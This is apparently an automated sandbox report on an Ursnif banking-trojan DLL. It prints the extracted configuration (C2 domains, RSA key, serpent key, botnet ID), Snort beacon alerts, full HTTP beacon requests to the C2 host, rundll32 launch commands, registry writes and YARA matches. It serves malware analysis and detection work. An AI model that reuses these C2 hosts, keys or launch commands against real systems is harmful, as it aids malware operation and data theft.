Source: 00000003.00000003.286056842.0000000000800000.00000040.00000001.sdmp |
Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "ESo3IAssZzE5ysG1EIw/4HtXAsFSsy8tqEpVxnbfbMCCYrlFNqq+URa5v25Vb8Fqg7CHgZW6+XrIJ25ylHpxuJ37IEqPduLid4tbupuJSyqgtTppR4zn02IvafAxKMAHSa619wHPy17p4K0/4kj7C1qaKtM+Xh1a06NCKm5N+m786e7cPquu7R927nhH6gnnNo+As4++HjROKgvXHXtuBEcH4AtLrYsdhCKBIunRJ4/JRjUYKn0tSnPBDf+Na9jWpvJHGTOYnu1CoHdLJTA2dOf5StD7LA6zUT/gtRsdQh+Fypc8IFyYvOY0WUwFr+dLMrtodQ8p5Mt7Wi/ACSlplY8XX2NGugFn+jyVYhw+Opw=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "6000", "server": "580", "serpent_key": "PNJeXnLTijShJqmR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"} |
Source: 3b17.dll |
Metadefender: Detection: 22% |
Perma Link |
Source: 3b17.dll |
ReversingLabs: Detection: 55% |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_00E839C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, |
3_2_00E839C5 |
Source: 3b17.dll |
Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe |
File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll |
Jump to behavior |
Source: 3b17.dll |
Static PE information: DYNAMIC_BASE, NX_COMPAT |
Source: |
Binary string: c:\418\521\Condition\lake\Free_yet\Sky.pdb source: 3b17.dll |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49721 -> 165.232.183.49:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49721 -> 165.232.183.49:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49723 -> 165.232.183.49:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49728 -> 165.232.183.49:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49728 -> 165.232.183.49:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49733 -> 165.232.183.49:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49733 -> 165.232.183.49:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49734 -> 165.232.183.49:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49736 -> 165.232.183.49:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49736 -> 165.232.183.49:80 |
Source: Joe Sandbox View |
ASN Name: ALLEGHENYHEALTHNETWORKUS ALLEGHENYHEALTHNETWORKUS |
Source: global traffic |
HTTP traffic detected: GET /TSVYq_2BhQPt7Rt8hvJk_/2BaPzRTN_2BosSeV/Hf1LtrPBkIb4xln/EiEQXon2wRV0GLivPg/BeoUjWvi9/GRgtTT2_2Fre8pZfIDlE/fPFOTkpE85cBWdt2Aor/5Y_2FWklStfFd9eU3TULSv/7l6H_2BVDc6Tn/LKJndKHH/PFJdkVMTIBMr500KWPhrAdO/8KvhNtw8HT/7mBX52dH5SplZXRyl/g96OGJKS4dVz/jB8OfmZgeb2/W3zD8P6To_2Fz1/V_2BecT6OliET_2F_2Boh/g6HDdicMqOjqFGcv/ETnCqudWareoM50/LlKXg0AU/cEv179y_2/BaWO HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /L1_2Fim_2FjKecpJDs7/g1Qm6wFOdGvT5e_2FhpFOy/0nZ5BcruXqyR0/vaHKQACk/N0rC9vWI6b9FMvL_2FIqp4S/ewVNte36FW/XPExsAA8VeJEhvgVb/KCeGwDykzB_2/FfJMiTYYFkB/UqSvKjZpB_2FYe/tRxQkg5XCh4uQfiEclNaO/UTPObDJYz_2FyBjB/v_2F2pSU4VWX5Hz/N9QtHdwYZ4WUrzEx5D/Q3nFD_2F2/8Ujs0VBDGr49KJ6AsZSH/EgfscPlAK393eCGdmmF/FMztWz0QhrOgK4MYRsuNHe/_2BkNcUEELtfv/x0cjHdMa17k7/_2FjZKD HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /IjC4EyiBxV/7uUoLMHVe5HqOMTwj/Y_2F9ou0UZzx/HwGYxCdSBjF/r3_2Fe8Khd4U7J/_2FuI_2FqZ2s_2FiaO0J_/2FTRLU31mRGflU2b/ZIJ0FncJBL1ujMu/UAyv0uh4NdsHQb_2Fp/7IlErLThx/qx9lbHRBIr_2BN2fcH7p/3MZS8xBk2HV8HO_2FwY/sjaecD1Ad9d4_2Bhfj7Udw/txqy4ndWQ8c2I/i_2FDCoi/J8FwQUA7HNUWWZ74vTmq4PN/8fRY05oVkC/eLBfQLcjbzJ0zm8P9/lrnxZ8213Jiq/fQMuhQcrOSv/_2FzhSntnuW3P7/C3J8_2BPrwDMXrvKewIwt/CP9ILXpGj47Z_2/F HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /LQ0ImNchzaabH7Vdh_/2FtRScd2v/QQzFkXdgAhow_2FcWrEP/n3sYFzsTbYVS3adrQdv/5Nzc_2BoRJpkAsHtAz6xV3/PsE8tlG0HHtLJ/T5TqRkda/BLQo9v_2FZTJ_2FPNHoYsv1/ye7M3znq3j/msHJ000mSBJHPb7nZ/E46dHTxH_2B4/eeBIrQKxL9Y/THDXKoks2pteky/rz_2F_2F0HzAFdHANfOc3/VtFiNo945_2BUObZ/oZuZG5t2mblYFyG/ygnFakJ2W33SNUuycB/j7wv4YZIa/0Hblow_2BZFOik2zX2YB/PXGpfOrjekSAdA19ARh/ahTrlQtp6MFSLYtpjwx_2B/D_2FHvRt HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /s96BBj_2BW0E7I/inPV3RC1ndWtP3TCiXWoq/7JGd2eicozVaSDqP/TIPKarKtLPkYLRx/VCo8CEXU6VSxFW20ap/EmssX5YuH/_2FmT3PaMcthev94lCLF/bWDeiN4zbJE6pfv8oTi/Qb34wmcConjidXNcLSenBo/rqyTVIe8oNi_2/FtqR6e_2/BJ_2F_2Ff8F8rmDwirrIz3L/Nk4szxk3_2/FsoXecNAHbdXzRM5b/qnqXpzn3ytbn/lcXf0S9I54h/nPX849yJE9mtRH/Mg8GQncb8LaArkE96Imgo/T60bsdjLtZH_2FnO/zpiezRZpQAYC8v0/MRTN6xcxZf9LqzW6jmrO/pZ HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /J7P_2BuFqD/6ho97HFr4RP0mXM5H/ZrJ1_2BByY5Q/ab42fK_2F4S/vR5_2FWZ9gdHVf/hFgLjlRclm4jOH5T1Dh_2/Bb6OfmnpAwg0WKei/TGgUW067tNixzOx/BwPRLezaId9OtwPQlY/CkLoMrcdP/aOG78DSC7_2BjhPI9iFK/iN8ZMV2kpmYpR22nO5N/DPr4nIGLY40kIrg97zu5zK/lZpfj5ONzqtKf/Vl33ZktQ/u9goArPbUAC5CGM3eIqnvuS/s_2BLl3UAj/4ev_2F316DIi43v_2/FeCwH6Boab2B/JVucmKuDRDu/1ldPV7QmrKfn1O/3tEgr34mvlOov5etr8LcR/vS5_2Fy HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive |
Source: unknown |
DNS traffic detected: queries for: gtr.antoinfer.com |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 05 Jul 2021 14:53:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30 |
Source: rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp |
String found in binary or memory: http://gtr.antoinfer.com/IjC4EyiBxV/7uUoLMHVe5HqOMTwj/Y_2F9ou0UZzx/HwGYxCdSBjF/r3_2Fe8Khd4U7J/_ |
Source: loaddll32.exe, 00000000.00000002.471604423.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp |
String found in binary or memory: http://gtr.antoinfer.com/L1_2Fim_2FjKecpJDs7/g1Qm6wFOdGvT5e_2FhpFOy/0nZ5BcruXqyR0/vaHKQACk/N0rC |
Source: ~DFF4A7B0CDF51E1130.TMP.24.dr, {2403265A-DDEC-11EB-90E4-ECF4BB862DED}.dat.24.dr |
String found in binary or memory: http://gtr.antoinfer.com/L1_2Fim_2FjKecpJDs7/g1Qm6wFOdGvT5e_2FhpFOy/0nZ5BcruXqyR0/vaHKQACk/N0rC9vWI6 |
Source: rundll32.exe, 00000003.00000002.471774654.000000000087B000.00000004.00000020.sdmp, {24032658-DDEC-11EB-90E4-ECF4BB862DED}.dat.24.dr, ~DFDEC152A471305B20.TMP.24.dr |
String found in binary or memory: http://gtr.antoinfer.com/TSVYq_2BhQPt7Rt8hvJk_/2BaPzRTN_2BosSeV/Hf1LtrPBkIb4xln/EiEQXon2wRV0GLivPg/B |
Source: Yara match |
File source: 3.2.rundll32.exe.54194a0.4.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.54194a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.loaddll32.exe.30194a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000002.475659294.0000000003019000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461720444.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461743288.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451412627.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461645135.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451272209.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451228636.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451358001.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461813677.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461763055.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.469498928.0000000005419000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461780198.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451303744.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451380572.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461795856.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451325276.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451398654.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461674265.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.475651924.0000000002E9C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.478328621.0000000005419000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: loaddll32.exe PID: 4876, type: MEMORY |
Source: Yara match |
File source: 3.2.rundll32.exe.54194a0.4.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.3.rundll32.exe.54194a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.loaddll32.exe.30194a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000002.475659294.0000000003019000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461720444.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461743288.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451412627.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461645135.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451272209.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451228636.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451358001.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461813677.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461763055.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.469498928.0000000005419000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461780198.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451303744.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451380572.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461795856.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451325276.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000003.451398654.0000000005498000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.461674265.0000000003098000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.475651924.0000000002E9C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000003.00000002.478328621.0000000005419000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: loaddll32.exe PID: 4876, type: MEMORY |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_00E839C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, |
3_2_00E839C5 |
Source: C:\Windows\System32\loaddll32.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\SysWOW64\rundll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue |
Source: C:\Windows\SysWOW64\rundll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\SysWOW64\rundll32.exe |
WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E191B9C GetProcAddress,NtCreateSection,memset, |
0_2_6E191B9C |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E191EC7 NtMapViewOfSection, |
0_2_6E191EC7 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E192485 NtQueryVirtualMemory, |
0_2_6E192485 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_00E82D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
3_2_00E82D06 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_00E88005 NtQueryVirtualMemory, |
3_2_00E88005 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E192264 |
0_2_6E192264 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1EB617 |
0_2_6E1EB617 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1F862F |
0_2_6E1F862F |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1ED6B0 |
0_2_6E1ED6B0 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1E1727 |
0_2_6E1E1727 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1EDC20 |
0_2_6E1EDC20 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E208CB7 |
0_2_6E208CB7 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1F0534 |
0_2_6E1F0534 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1F8AA2 |
0_2_6E1F8AA2 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E2162C0 |
0_2_6E2162C0 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1EAB67 |
0_2_6E1EAB67 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E208B97 |
0_2_6E208B97 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1EE050 |
0_2_6E1EE050 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1F8861 |
0_2_6E1F8861 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E1F917A |
0_2_6E1F917A |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_00E82206 |
3_2_00E82206 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_00E87DE0 |
3_2_00E87DE0 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_00E83109 |
3_2_00E83109 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1EB617 |
3_2_6E1EB617 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1F862F |
3_2_6E1F862F |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1F9653 |
3_2_6E1F9653 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1ED6B0 |
3_2_6E1ED6B0 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1F8F15 |
3_2_6E1F8F15 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1E1727 |
3_2_6E1E1727 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1EDC20 |
3_2_6E1EDC20 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E208CB7 |
3_2_6E208CB7 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1F8CD4 |
3_2_6E1F8CD4 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1F0534 |
3_2_6E1F0534 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1F8AA2 |
3_2_6E1F8AA2 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E2162C0 |
3_2_6E2162C0 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1EAB67 |
3_2_6E1EAB67 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E208B97 |
3_2_6E208B97 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1F93EE |
3_2_6E1F93EE |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1EE050 |
3_2_6E1EE050 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1F8861 |
3_2_6E1F8861 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_6E1F917A |
3_2_6E1F917A |
Source: C:\Windows\System32\loaddll32.exe |
Code function: String function: 6E1DE9F0 appears 35 times |
|
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: String function: 6E1DE9F0 appears 37 times |
|
Source: 3b17.dll |
Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
Source: classification engine |
Classification label: mal80.troj.winDLL@18/8@6/1 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 3_2_00E8513E CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, |
3_2_00E8513E |
Source: C:\Program Files\internet explorer\iexplore.exe |
File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High |
Jump to behavior |
Source: C:\Program Files\internet explorer\iexplore.exe |
File created: C:\Users\user\AppData\Local\Temp\~DF411F8F60C26A5FE3.TMP |
Jump to behavior |
Source: 3b17.dll |
Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: C:\Program Files\internet explorer\iexplore.exe |
File read: C:\Users\desktop.ini |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Seasonthing |
Source: 3b17.dll |
Metadefender: Detection: 22% |
Source: 3b17.dll |
ReversingLabs: Detection: 55% |
Source: unknown |
Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\3b17.dll' |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1 |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Seasonthing |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1 |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Seatforce |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Spaceclose |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Time |
|
Source: unknown |
Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding |
|
Source: C:\Program Files\internet explorer\iexplore.exe |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3472 CREDAT:17410 /prefetch:2 |
|
Source: C:\Program Files\internet explorer\iexplore.exe |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3472 CREDAT:82950 /prefetch:2 |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1 |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Seasonthing |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Seatforce |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Spaceclose |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Time |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1 |
Jump to behavior |
Source: C:\Program Files\internet explorer\iexplore.exe |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3472 CREDAT:17410 /prefetch:2 |
Jump to behavior |
Source: C:\Program Files\internet explorer\iexplore.exe |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3472 CREDAT:82950 /prefetch:2 |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Automated click: OK |
Source: C:\Windows\SysWOW64\rundll32.exe |
Automated click: OK |
Source: C:\Windows\SysWOW64\rundll32.exe |
Automated click: OK |
Source: C:\Windows\SysWOW64\rundll32.exe |
Automated click: OK |
Source: Window Recorder |
